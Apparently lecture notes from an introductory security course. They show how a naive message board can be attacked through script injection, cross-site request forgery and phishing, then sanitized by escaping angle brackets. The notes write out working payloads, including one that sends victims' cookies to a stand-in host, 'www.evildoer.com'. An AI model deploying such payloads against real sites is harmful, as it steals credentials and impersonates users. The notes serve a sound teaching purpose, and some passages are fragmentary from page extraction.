http://rona.cs.usna.edu/~smith/msg/mb.html
and enters "Hello World!".
mb.html as rendered by browser | mb.html HTML code |
Message Board
|
<html><body> <h1>Message Board</h1> <hr> <form action="mb.cgi"> <input type="text" name="msg"> <input type="button" onclick="submit()" value="post message"> </form> </body></html> |
http://rona.cs.usna.edu/~smith/msg/mb.cgi?msg=Hello+World!
<b>smith</b>: Hello World!
into the body of the HTML code. In other words, your
message is inserted literally character-by-character,
prefaced by your username (in bold).
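As a rough sketch of what that literal insertion amounts to, the server-side step can be pictured as plain string concatenation. The function name `renderPost` is hypothetical and JavaScript is used only for illustration; the actual implementation of mb.cgi is not shown in these notes.

```javascript
// Hypothetical sketch: how a server might build the line it inserts
// into the message board. The real mb.cgi code is not shown here.
function renderPost(username, msg) {
  // The message is copied in character-by-character, with no checking.
  return "<b>" + username + "</b>: " + msg + "<br>";
}

console.log(renderPost("smith", "Hello World!"));
// prints: <b>smith</b>: Hello World!<br>
```

Because nothing in this sketch inspects msg, any HTML tags contained in the message end up in the page as tags rather than as text.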
mb.html as rendered by browser | mb.html HTML code |
Message Board
smith: Hello World! |
<html><body>
<h1>Message Board</h1>
<hr>
<b>smith</b>: Hello World!<br>
<form action="mb.cgi"> <input type="text" name="msg">
<input type="button" onclick="submit()" value="post message">
</form>
</body></html>
|
smith
) post the message
I <u>hate</u> waking up early!
to the board, the result will be that anyone viewing the message board sees
Check out this picture <img src="http://social-context.org/wp-content/uploads/2011/08/skeptical-cat-is-fraught-with-skepticism1.jpg">
And you can post links and other things as well. I could even post a script! Suppose I posted the following "message":
<script type="text/javascript">var i = 0; while (i < 100) { document.write("GO NAVY! "); i = i + 1; }</script>
Sometimes data sent in HTML forms are processed by a server that manages a computer database. If the form input data is not sanitized, a malicious user may be able to trick the database server into revealing some or all of its data by injecting database commands into the form. The language used to interact with databases is called Structured Query Language (SQL), which is why this type of attack is known as an SQL injection attack.
As a result of the attack, the targeted site was immediately shut down and a few weeks later it was permanently retired.
while (1 == 1) in the above code rather than while (i < 100)? What if I posted
<script type="text/javascript">document.location="http://www.usma.edu";</script>
on the message board? All of these examples show that it is easy to take down the message board, i.e. render it totally inaccessible to anyone, by injecting code into the data that gets sent to the server. This kind of attack is called an injection attack for that very reason, and is a general kind of attack. In fact, we already saw an example of an injection attack when we tricked the guess-a-number game and were able to win in one guess every time. We'll look at several examples of how we can use injection attacks to do more subtle and devious things than just disable the page, and then we'll look at how we can protect a website like the message board against injection attacks.
The obvious way (not the best way!) to do password protection is to have the usernames and passwords stored on the server, and have the user supply them when he asks for protected pages. But what if the whole site is supposed to be protected? One way is to have you provide your username and password every time your browser makes a GET request to the webserver. This is clearly too much of a pain in the neck for us users! Next simplest plan for password-authenticated websites: have your web-browser save your username and password on your machine, so that it can retrieve them and send them automatically with every request it makes to that webserver. That's how the message board works.
The name for locally (i.e. on the browser's machine) stored information associated with a particular website is "cookie". Be aware that these are on your machine and could be misused by bad people. You can disable cookies in your browser, but then all sorts of sites won't work. (Yet another functionality vs. security trade-off!) You can also wipe the browser's cookie memory periodically.
The cookie for a page with URL X gets sent with every request to a page in the subtree rooted at X's directory. That way you don't have to re-enter your username and password for each page in a site. Cookies are sent in the HTTP traffic as part of the "GET" request, but not in the URL, simply as additional HTTP info. This is what an HTTP "GET" request with cookies looks like.
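To make the "additional HTTP info" concrete, here is a minimal sketch that assembles the text of such a request. The function name `buildGetRequest` is hypothetical, and the cookie value is an assumed example in the uname/pswd style used elsewhere in these notes. The point is only that the cookie travels in a `Cookie:` header line rather than in the URL.

```javascript
// Hypothetical sketch: assemble the text of an HTTP GET request that
// carries a cookie. The cookie value below is an assumed example.
function buildGetRequest(host, path, cookie) {
  return [
    "GET " + path + " HTTP/1.1", // request line: the URL path goes here
    "Host: " + host,
    "Cookie: " + cookie,         // sent as a header, not as part of the URL
    "",                          // blank line marks the end of the headers
    ""
  ].join("\r\n");
}

const request = buildGetRequest(
  "rona.cs.usna.edu",
  "/~smith/msg/mb.cgi?msg=Hello+World!",
  "uname=m16YYYY&pswd=foo"
);
console.log(request);
```

The first line of the output contains only the path and the msg parameter. The username and password appear further down, on the `Cookie:` line.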
document.cookie. Thus, the code alert(document.cookie) inserted into the message board by any one user will cause everyone who looks at the page to see their own cookie. That is because the cookie you see depends on who's viewing the code, not who posted the code. It's like a mirror, in a way.
This point is really important, so let's be concrete with an example. Suppose we have users m16XXXX, m16YYYY and m16ZZZZ with passwords rab, foo and bar respectively. User m16XXXX posts
<script type="text/javascript">alert(document.cookie);</script>
to the message board. Now that script is embedded in the message board, i.e. it is client-side script that will be executed by the browser of anyone visiting the message board. Next suppose user m16YYYY visits the message board. Her browser executes the script code put there by m16XXXX and up pops an alert box that says:
uname=m16YYYY&pswd=foo
... because her browser has her cookies. Next suppose user m16ZZZZ visits the message board. His browser executes the script code put there by m16XXXX and up pops an alert box that says:
uname=m16ZZZZ&pswd=bar
... because his browser has his cookies.
<script type="text/javascript">document.location="http://rona.cs.usna.edu/~smith/msg/mb.cgi?msg=Die+Bart+die!";</script>
If he can trick m16YYYY into visiting his webpage, and she happens to have logged into Prof. Smith's message board page already during that browser session, then here's what happens:
GET /~smith/msg/mb.cgi?msg=Die+Bart+die! request to the server rona.cs.usna.edu. Since m16YYYY has a cookie for that page (from having logged in previously), her cookie, containing her username and password, gets sent to the server rona.cs.usna.edu.
rona.cs.usna.edu receives the GET request with m16YYYY's username and password, and so inserts the message "Die Bart die!" prefaced with m16YYYY's username.
rona.cs.usna.edu.
The GET request that caused the message to be posted was sent from m16YYYY's browser with her username and password, just as if she'd typed it in the message board webpage herself.
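To see why the server cannot tell the two cases apart, here is a minimal sketch of the server's point of view. The function name `handlePost` and the `users` table are hypothetical, and the cookie format (uname=...&pswd=...) simply follows the examples in these notes. The real mb.cgi may work differently.

```javascript
// Hypothetical sketch of the server's point of view. The user table and
// function name are assumptions made for illustration only.
const users = new Map([["m16XXXX", "rab"], ["m16YYYY", "foo"], ["m16ZZZZ", "bar"]]);

function handlePost(cookie, query) {
  const creds = new URLSearchParams(cookie); // parses "uname=...&pswd=..."
  const uname = creds.get("uname");
  // Reject the request unless the cookie holds a known username/password pair.
  if (!users.has(uname) || users.get(uname) !== creds.get("pswd")) return null;
  const msg = new URLSearchParams(query).get("msg"); // "+" decodes to a space
  return "<b>" + uname + "</b>: " + msg + "<br>";
}

// Typed into the message board form by m16YYYY herself:
const typed = handlePost("uname=m16YYYY&pswd=foo", "msg=Hello+World!");
// Triggered by the evildoer's script running in m16YYYY's browser:
const forged = handlePost("uname=m16YYYY&pswd=foo", "msg=Die+Bart+die!");

console.log(typed);
console.log(forged);
```

Both calls receive exactly the same cookie, so in this sketch the server has no information it could use to distinguish the message she typed from the one the script sent on her behalf.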
The essence of this kind of attack is that the evildoer sets things up so that the victim's browser executes a script, and that means the script runs with the credentials (username/password in this case) of the victim. It might not seem that serious when we're just attacking the message board. However, what if we did a similar thing with a bank account rather than a message board, and instead of posting a threat, the code we sent caused funds to be transferred?
A Phishing approach is to send out a blanket e-mail to a large number of people hoping that, out of all of them, someone will click on the link and happen to be logged in to the message board at the time. You try to make the e-mail enticing or make it look legitimate, but your real hope is that out of enough people you'll find that someone.
A Spear Phishing approach is to identify one or a small number of targets, do some research on them (e.g. check Facebook, Twitter, company websites, etc.), and craft an e-mail based on that knowledge that they're especially likely to accept as legitimate and in which, therefore, they're likely to click on the link to the evildoer's website.
Of course if an e-mail client (i.e. a program for reading
e-mail) runs scripts embedded in HTML-formatted e-mail, we
don't need the victim to click on anything: we could simply
embed a script in the e-mail that sets
document.location
to the evildoer's website.
In that case, merely opening the e-mail would send you to the
site. For this reason, most e-mail clients refuse to
run Javascript embedded in an e-mail. Hopefully you now see
why!
www.evildoer.com
Here's a nice picture: <script type="text/javascript">document.write('<img src="http://www.evildoer.com/kitten.jpg?' + document.cookie + '">');</script>
img element:
<img src="http://www.evildoer.com/kitten.jpg?uname=m16YYYY&passwd=foo">
... into the body of the message board's HTML code.
www.evildoer.com to GET the file /kitten.jpg?uname=m16YYYY&passwd=foo
GET /kitten.jpg?uname=m16YYYY&passwd=foo HTTP/1.1
and, lo and behold, he has m16YYYY's username and password!
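To illustrate how little work is left once that request line shows up in a server log, here is a small sketch that pulls the values back out of it. The function name `extractQuery` is hypothetical, and the request line is the one from the example above.

```javascript
// Hypothetical sketch: recover the query-string values from a logged
// HTTP request line of the form "METHOD target VERSION".
function extractQuery(requestLine) {
  const target = requestLine.split(" ")[1];  // e.g. "/kitten.jpg?uname=..."
  const queryStart = target.indexOf("?");
  if (queryStart === -1) return {};          // no query string at all
  const params = new URLSearchParams(target.slice(queryStart + 1));
  return Object.fromEntries(params);         // e.g. { uname: ..., passwd: ... }
}

const stolen = extractQuery("GET /kitten.jpg?uname=m16YYYY&passwd=foo HTTP/1.1");
console.log(stolen.uname, stolen.passwd);
// prints: m16YYYY foo
```

No kitten.jpg file needs to exist on the server for this to work, since the request is logged either way.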
Here's the sledgehammer approach to sanitizing our message board input: You can't have any HTML or embedded Javascript code without < and >, so if we escaped those characters before putting the message into the message board, nobody could do an injection attack. There are a variety of ways to escape them, but since their ASCII values are 60 and 62, the following works: replace < with &#60; and > with &#62;. Here's a little bit of Javascript code that does it. Assuming you have a variable msg that has the original message, this creates variable newmsg that has the same string except that all the <'s have been replaced with &#60;'s, and all the >'s have been replaced with &#62;'s.
1999 NASA: The $328 million Mars Climate Orbiter was sent into the Mars atmosphere on the wrong trajectory, causing it to disintegrate. The cause: one piece of software assumed it received input in metric units (newton-sec), but was sent data in English units (pounds-sec).
2001 Multidata Systems: Cancer treatment software calculated radiation dose based on a user-input configuration of lead shielding blocks. Calculations assumed no more than four shielding blocks were used, but the software allowed data for five blocks to be entered. The result: Cobalt-60 gamma radiation overdosing, an unknown number of deaths, and three radiation physicists charged with second-degree murder.
var newmsg = "";
var count = 0;
// Copy msg into newmsg one character at a time, escaping < and >.
while (count < msg.length) {
  var nextChar = msg[count];
  if (nextChar == "<")
    newmsg = newmsg + "&#60;";
  else if (nextChar == ">")
    newmsg = newmsg + "&#62;";
  else
    newmsg = newmsg + nextChar;
  count = count + 1;
}
Now, would this code be run on the client or on the server? Hopefully by now you realize that it must run on the server, because a bad person could contrive to send the HTTP GET request to the server without going through the client-side validation (just as we saw with server side scripts in the last lesson).
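The same escaping idea can also be sketched more compactly with `String.prototype.replace`. The function name `escapeAngleBrackets` is hypothetical; the numeric entities `&#60;` and `&#62;` come from the ASCII values 60 and 62 mentioned above. Like the loop, this sketch handles only < and >, which is all the sledgehammer approach calls for.

```javascript
// Sketch of the "sledgehammer" escaping using String.prototype.replace.
// The /g flag makes each replace apply to every occurrence, not just the first.
function escapeAngleBrackets(msg) {
  return msg.replace(/</g, "&#60;").replace(/>/g, "&#62;");
}

const attack = '<script type="text/javascript">alert(document.cookie);</script>';
console.log(escapeAngleBrackets(attack));
// prints: &#60;script type="text/javascript"&#62;alert(document.cookie);&#60;/script&#62;
```

A browser displays the escaped result as visible text instead of running it. General-purpose HTML escapers typically also escape & and quote characters, which matters when the text is placed somewhere other than the page body, such as inside an attribute value.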
The above approach does secure us from injection attack, but that security comes at a cost. We can no longer use any HTML in our message board postings. That means no posting pictures, no using italics and bold face, and no links. The real trick is to sanitize the input in such a way that we're safe from the bad stuff, but users can still have the power and flexibility to post things like pictures, links, etc. It's a difficult job, however. One of the things you should have walked away from the programming part of the course appreciating is that it's hard to write a program that anticipates all the kinds of inputs that a dumb, sloppy or malicious user might throw at you.